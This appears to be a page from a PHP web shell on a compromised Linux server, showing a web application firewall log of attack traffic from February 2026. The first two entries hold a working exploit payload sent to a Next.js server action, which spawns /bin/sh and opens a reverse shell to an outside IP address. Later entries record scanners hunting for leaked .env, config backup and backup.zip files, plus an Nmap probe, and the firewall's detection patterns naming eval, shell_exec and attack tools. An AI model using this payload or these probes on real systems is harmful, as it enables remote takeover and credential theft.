HEX
Server: nginx/1.26.1
System: Linux iZrj9cbdvwu1cot8sjlyzlZ 5.10.134-15.al8.x86_64 #1 SMP Thu Jul 20 00:44:04 CST 2023 x86_64
User: www (1000)
PHP: 7.4.33
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /www/wwwlogs/free_waf_log/
Upload Files
File: /www/wwwlogs/free_waf_log/未绑定域名_2026-02-25.log
["2026-02-25 00:36:13","176.65.132.94","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> 0:{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"var n=process.mainModule.require('net'),c=process.mainModule.require('child_process'),s=c.spawn('\/bin\/sh',[]),cl=new n.Socket();cl.connect(12323,'176.65.132.94',()=>{cl.pipe(s.stdin);s.stdout.pipe(cl);s.stderr.pipe(cl);});\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}","POST \/ HTTP\/1.1\ncontent-type:multipart\/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad\naccept-encoding:gzip\nnext-action:x\nconnection:close\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36\nhost:47.254.126.238:80\ncontent-length:621\n\n------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"var n=process.mainModule.require('net'),c=process.mainModule.require('child_process'),s=c.spawn('\/bin\/sh',[]),cl=new n.Socket();cl.connect(12323,'176.65.132.94',()=>{cl.pipe(s.stdin);s.stdout.pipe(cl);s.stderr.pipe(cl);});\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n------WebKitFormBoundaryx8jO2oVc6SWP3Sad--\r\n"]
["2026-02-25 01:06:10","176.65.132.94","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> 0:{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"var n=process.mainModule.require('net'),c=process.mainModule.require('child_process'),s=c.spawn('\/bin\/sh',[]),cl=new n.Socket();cl.connect(12323,'176.65.132.94',()=>{cl.pipe(s.stdin);s.stdout.pipe(cl);s.stderr.pipe(cl);});\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}","POST \/ HTTP\/1.1\naccept-encoding:gzip\nnext-action:x\nconnection:close\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36\nhost:47.254.126.238:80\ncontent-type:multipart\/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad\ncontent-length:621\n\n------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"var n=process.mainModule.require('net'),c=process.mainModule.require('child_process'),s=c.spawn('\/bin\/sh',[]),cl=new n.Socket();cl.connect(12323,'176.65.132.94',()=>{cl.pipe(s.stdin);s.stdout.pipe(cl);s.stderr.pipe(cl);});\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n------WebKitFormBoundaryx8jO2oVc6SWP3Sad--\r\n"]
["2026-02-25 06:31:03","103.188.169.213","GET","\/.env.bak","Python\/3.14 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/.env.bak","GET \/.env.bak HTTP\/1.1\nuser-agent:Python\/3.14 aiohttp\/3.13.3\naccept-encoding:gzip, deflate, br, zstd\naccept:*\/*\nhost:47.254.126.238\n\n"]
["2026-02-25 06:31:03","103.188.169.213","GET","\/.env.old","Python\/3.14 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/.env.old","GET \/.env.old HTTP\/1.1\nuser-agent:Python\/3.14 aiohttp\/3.13.3\naccept-encoding:gzip, deflate, br, zstd\naccept:*\/*\nhost:47.254.126.238\n\n"]
["2026-02-25 06:31:04","103.188.169.213","GET","\/.env.swp","Python\/3.14 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/.env.swp","GET \/.env.swp HTTP\/1.1\nuser-agent:Python\/3.14 aiohttp\/3.13.3\naccept-encoding:gzip, deflate, br, zstd\naccept:*\/*\nhost:47.254.126.238\n\n"]
["2026-02-25 06:31:04","116.68.171.118","GET","\/backup.zip","Python\/3.14 aiohttp\/3.13.3","url","^\/(vhost|bbs|host|wwwroot|www|site|root|backup|data|ftp|db|admin|website|web).*\\.(rar|sql|zip|tar\\.gz|tar)$ >> 1:\/backup.zip","GET \/backup.zip HTTP\/1.1\nuser-agent:Python\/3.14 aiohttp\/3.13.3\naccept-encoding:gzip, deflate, br, zstd\naccept:*\/*\nhost:47.254.126.238\n\n"]
["2026-02-25 06:31:04","103.188.169.213","GET","\/api\/.env.swp","Python\/3.14 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/api\/.env.swp","GET \/api\/.env.swp HTTP\/1.1\nuser-agent:Python\/3.14 aiohttp\/3.13.3\naccept-encoding:gzip, deflate, br, zstd\naccept:*\/*\nhost:47.254.126.238\n\n"]
["2026-02-25 06:31:04","103.188.169.213","GET","\/config.php.bak","Python\/3.14 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/config.php.bak","GET \/config.php.bak HTTP\/1.1\nuser-agent:Python\/3.14 aiohttp\/3.13.3\naccept-encoding:gzip, deflate, br, zstd\naccept:*\/*\nhost:47.254.126.238\n\n"]
["2026-02-25 06:31:04","103.188.169.213","GET","\/api\/.env.bak","Python\/3.14 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/api\/.env.bak","GET \/api\/.env.bak HTTP\/1.1\nuser-agent:Python\/3.14 aiohttp\/3.13.3\naccept-encoding:gzip, deflate, br, zstd\naccept:*\/*\nhost:47.254.126.238\n\n"]
["2026-02-25 06:31:04","103.188.169.213","GET","\/admin\/backup.zip","Python\/3.14 aiohttp\/3.13.3","url","^\/(vhost|bbs|host|wwwroot|www|site|root|backup|data|ftp|db|admin|website|web).*\\.(rar|sql|zip|tar\\.gz|tar)$ >> 1:\/admin\/backup.zip","GET \/admin\/backup.zip HTTP\/1.1\nuser-agent:Python\/3.14 aiohttp\/3.13.3\naccept-encoding:gzip, deflate, br, zstd\naccept:*\/*\nhost:47.254.126.238\n\n"]
["2026-02-25 06:31:04","103.188.169.213","GET","\/admin\/backup.zip","Python\/3.14 aiohttp\/3.13.3","url","60秒以内累计超过6次以上非法请求,封锁180秒","GET \/admin\/backup.zip HTTP\/1.1\nuser-agent:Python\/3.14 aiohttp\/3.13.3\naccept-encoding:gzip, deflate, br, zstd\naccept:*\/*\nhost:47.254.126.238\n\n"]
["2026-02-25 06:31:04","116.68.171.118","GET","\/dev\/config.php.bak","Python\/3.14 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/dev\/config.php.bak","GET \/dev\/config.php.bak HTTP\/1.1\nuser-agent:Python\/3.14 aiohttp\/3.13.3\naccept-encoding:gzip, deflate, br, zstd\naccept:*\/*\nhost:47.254.126.238\n\n"]
["2026-02-25 06:31:04","116.68.171.118","GET","\/stg\/.env.bak","Python\/3.14 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/stg\/.env.bak","GET \/stg\/.env.bak HTTP\/1.1\nuser-agent:Python\/3.14 aiohttp\/3.13.3\naccept-encoding:gzip, deflate, br, zstd\naccept:*\/*\nhost:47.254.126.238\n\n"]
["2026-02-25 06:31:04","116.68.171.118","GET","\/stg\/.env.old","Python\/3.14 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/stg\/.env.old","GET \/stg\/.env.old HTTP\/1.1\nuser-agent:Python\/3.14 aiohttp\/3.13.3\naccept-encoding:gzip, deflate, br, zstd\naccept:*\/*\nhost:47.254.126.238\n\n"]
["2026-02-25 06:31:04","116.68.171.118","GET","\/stg\/.env.swp","Python\/3.14 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/stg\/.env.swp","GET \/stg\/.env.swp HTTP\/1.1\nuser-agent:Python\/3.14 aiohttp\/3.13.3\naccept-encoding:gzip, deflate, br, zstd\naccept:*\/*\nhost:47.254.126.238\n\n"]
["2026-02-25 06:31:04","116.68.171.118","GET","\/stg\/config.php.bak","Python\/3.14 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/stg\/config.php.bak","GET \/stg\/config.php.bak HTTP\/1.1\nuser-agent:Python\/3.14 aiohttp\/3.13.3\naccept-encoding:gzip, deflate, br, zstd\naccept:*\/*\nhost:47.254.126.238\n\n"]
["2026-02-25 06:31:04","116.68.171.118","GET","\/backup\/.env.old","Python\/3.14 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/backup\/.env.old","GET \/backup\/.env.old HTTP\/1.1\nuser-agent:Python\/3.14 aiohttp\/3.13.3\naccept-encoding:gzip, deflate, br, zstd\naccept:*\/*\nhost:47.254.126.238\n\n"]
["2026-02-25 06:31:04","116.68.171.118","GET","\/backup\/.env.old","Python\/3.14 aiohttp\/3.13.3","url","60秒以内累计超过6次以上非法请求,封锁180秒","GET \/backup\/.env.old HTTP\/1.1\nuser-agent:Python\/3.14 aiohttp\/3.13.3\naccept-encoding:gzip, deflate, br, zstd\naccept:*\/*\nhost:47.254.126.238\n\n"]
["2026-02-25 09:51:36","103.188.169.213","GET","\/.env.bak","Python\/3.10 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/.env.bak","GET \/.env.bak HTTP\/1.1\nuser-agent:Python\/3.10 aiohttp\/3.13.3\naccept:*\/*\nhost:47.254.126.238\naccept-encoding:gzip, deflate\n\n"]
["2026-02-25 09:51:36","103.188.169.213","GET","\/backup.zip","Python\/3.10 aiohttp\/3.13.3","url","^\/(vhost|bbs|host|wwwroot|www|site|root|backup|data|ftp|db|admin|website|web).*\\.(rar|sql|zip|tar\\.gz|tar)$ >> 1:\/backup.zip","GET \/backup.zip HTTP\/1.1\nuser-agent:Python\/3.10 aiohttp\/3.13.3\naccept:*\/*\nhost:47.254.126.238\naccept-encoding:gzip, deflate\n\n"]
["2026-02-25 09:51:36","103.188.169.213","GET","\/api\/.env.bak","Python\/3.10 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/api\/.env.bak","GET \/api\/.env.bak HTTP\/1.1\nuser-agent:Python\/3.10 aiohttp\/3.13.3\naccept:*\/*\nhost:47.254.126.238\naccept-encoding:gzip, deflate\n\n"]
["2026-02-25 09:51:36","103.188.169.213","GET","\/admin\/.env.bak","Python\/3.10 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/admin\/.env.bak","GET \/admin\/.env.bak HTTP\/1.1\nuser-agent:Python\/3.10 aiohttp\/3.13.3\naccept:*\/*\nhost:47.254.126.238\naccept-encoding:gzip, deflate\n\n"]
["2026-02-25 09:51:36","103.188.169.213","GET","\/admin\/backup.zip","Python\/3.10 aiohttp\/3.13.3","url","^\/(vhost|bbs|host|wwwroot|www|site|root|backup|data|ftp|db|admin|website|web).*\\.(rar|sql|zip|tar\\.gz|tar)$ >> 1:\/admin\/backup.zip","GET \/admin\/backup.zip HTTP\/1.1\nuser-agent:Python\/3.10 aiohttp\/3.13.3\naccept:*\/*\nhost:47.254.126.238\naccept-encoding:gzip, deflate\n\n"]
["2026-02-25 09:51:36","116.68.171.118","GET","\/backup\/.env.bak","Python\/3.10 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/backup\/.env.bak","GET \/backup\/.env.bak HTTP\/1.1\nuser-agent:Python\/3.10 aiohttp\/3.13.3\naccept:*\/*\nhost:47.254.126.238\naccept-encoding:gzip, deflate\n\n"]
["2026-02-25 09:51:36","116.68.171.118","GET","\/dev\/.env.bak","Python\/3.10 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/dev\/.env.bak","GET \/dev\/.env.bak HTTP\/1.1\nuser-agent:Python\/3.10 aiohttp\/3.13.3\naccept:*\/*\nhost:47.254.126.238\naccept-encoding:gzip, deflate\n\n"]
["2026-02-25 09:51:36","103.188.169.213","GET","\/backup\/backup.zip","Python\/3.10 aiohttp\/3.13.3","url","^\/(vhost|bbs|host|wwwroot|www|site|root|backup|data|ftp|db|admin|website|web).*\\.(rar|sql|zip|tar\\.gz|tar)$ >> 1:\/backup\/backup.zip","GET \/backup\/backup.zip HTTP\/1.1\nuser-agent:Python\/3.10 aiohttp\/3.13.3\naccept:*\/*\nhost:47.254.126.238\naccept-encoding:gzip, deflate\n\n"]
["2026-02-25 09:51:36","103.188.169.213","GET","\/.git\/.env.bak","Python\/3.10 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/.git\/.env.bak","GET \/.git\/.env.bak HTTP\/1.1\nuser-agent:Python\/3.10 aiohttp\/3.13.3\naccept:*\/*\nhost:47.254.126.238\naccept-encoding:gzip, deflate\n\n"]
["2026-02-25 09:51:36","103.188.169.213","GET","\/.git\/.env.bak","Python\/3.10 aiohttp\/3.13.3","url","60秒以内累计超过6次以上非法请求,封锁180秒","GET \/.git\/.env.bak HTTP\/1.1\nuser-agent:Python\/3.10 aiohttp\/3.13.3\naccept:*\/*\nhost:47.254.126.238\naccept-encoding:gzip, deflate\n\n"]
["2026-02-25 09:51:36","116.68.171.118","GET","\/git\/.env.bak","Python\/3.10 aiohttp\/3.13.3","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/git\/.env.bak","GET \/git\/.env.bak HTTP\/1.1\nuser-agent:Python\/3.10 aiohttp\/3.13.3\naccept:*\/*\nhost:47.254.126.238\naccept-encoding:gzip, deflate\n\n"]
["2026-02-25 16:37:28","121.43.118.50","POST","\/sdk","Mozilla\/5.0 (compatible; Nmap Scripting Engine; https:\/\/nmap.org\/book\/nse.html)","user_agent","(HTTrack|Apache-HttpClient|harvest|audit|dirbuster|pangolin|nmap|sqln|hydra|Parser|libwww|BBBike|sqlmap|w3af|owasp|Nikto|fimap|havij|zmeu|BabyKrokodil|netsparker|httperf| SF\/) >> 1:Mozilla\/5.0 (compatible; Nmap Scripting Engine; https:\/\/nmap.org\/book\/nse.html)","POST \/sdk HTTP\/1.1\nuser-agent:Mozilla\/5.0 (compatible; Nmap Scripting Engine; https:\/\/nmap.org\/book\/nse.html)\nhost:47.254.126.238\ncontent-length:441\nconnection:close\n\n<soap:Envelope xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\" xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" xmlns:soap=\"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\"><soap:Header><operationID>00000001-00000001<\/operationID><\/soap:Header><soap:Body><RetrieveServiceContent xmlns=\"urn:internalvim25\"><_this xsi:type=\"ManagedObjectReference\" type=\"ServiceInstance\">ServiceInstance<\/_this><\/RetrieveServiceContent><\/soap:Body><\/soap:Envelope>"]
["2026-02-25 16:37:28","121.43.118.50","GET","\/nmaplowercheck1772008647","Mozilla\/5.0 (compatible; Nmap Scripting Engine; https:\/\/nmap.org\/book\/nse.html)","user_agent","(HTTrack|Apache-HttpClient|harvest|audit|dirbuster|pangolin|nmap|sqln|hydra|Parser|libwww|BBBike|sqlmap|w3af|owasp|Nikto|fimap|havij|zmeu|BabyKrokodil|netsparker|httperf| SF\/) >> 1:Mozilla\/5.0 (compatible; Nmap Scripting Engine; https:\/\/nmap.org\/book\/nse.html)","GET \/nmaplowercheck1772008647 HTTP\/1.1\nuser-agent:Mozilla\/5.0 (compatible; Nmap Scripting Engine; https:\/\/nmap.org\/book\/nse.html)\nhost:47.254.126.238\nconnection:close\n\n"]
["2026-02-25 16:37:28","121.43.118.50","GET","\/evox\/about","Mozilla\/5.0 (compatible; Nmap Scripting Engine; https:\/\/nmap.org\/book\/nse.html)","user_agent","(HTTrack|Apache-HttpClient|harvest|audit|dirbuster|pangolin|nmap|sqln|hydra|Parser|libwww|BBBike|sqlmap|w3af|owasp|Nikto|fimap|havij|zmeu|BabyKrokodil|netsparker|httperf| SF\/) >> 1:Mozilla\/5.0 (compatible; Nmap Scripting Engine; https:\/\/nmap.org\/book\/nse.html)","GET \/evox\/about HTTP\/1.1\nuser-agent:Mozilla\/5.0 (compatible; Nmap Scripting Engine; https:\/\/nmap.org\/book\/nse.html)\nhost:47.254.126.238\nconnection:close\n\n"]
["2026-02-25 16:37:29","121.43.118.50","GET","\/HNAP1","Mozilla\/5.0 (compatible; Nmap Scripting Engine; https:\/\/nmap.org\/book\/nse.html)","user_agent","(HTTrack|Apache-HttpClient|harvest|audit|dirbuster|pangolin|nmap|sqln|hydra|Parser|libwww|BBBike|sqlmap|w3af|owasp|Nikto|fimap|havij|zmeu|BabyKrokodil|netsparker|httperf| SF\/) >> 1:Mozilla\/5.0 (compatible; Nmap Scripting Engine; https:\/\/nmap.org\/book\/nse.html)","GET \/HNAP1 HTTP\/1.1\nuser-agent:Mozilla\/5.0 (compatible; Nmap Scripting Engine; https:\/\/nmap.org\/book\/nse.html)\nhost:47.254.126.238\nconnection:close\n\n"]
@ Telegram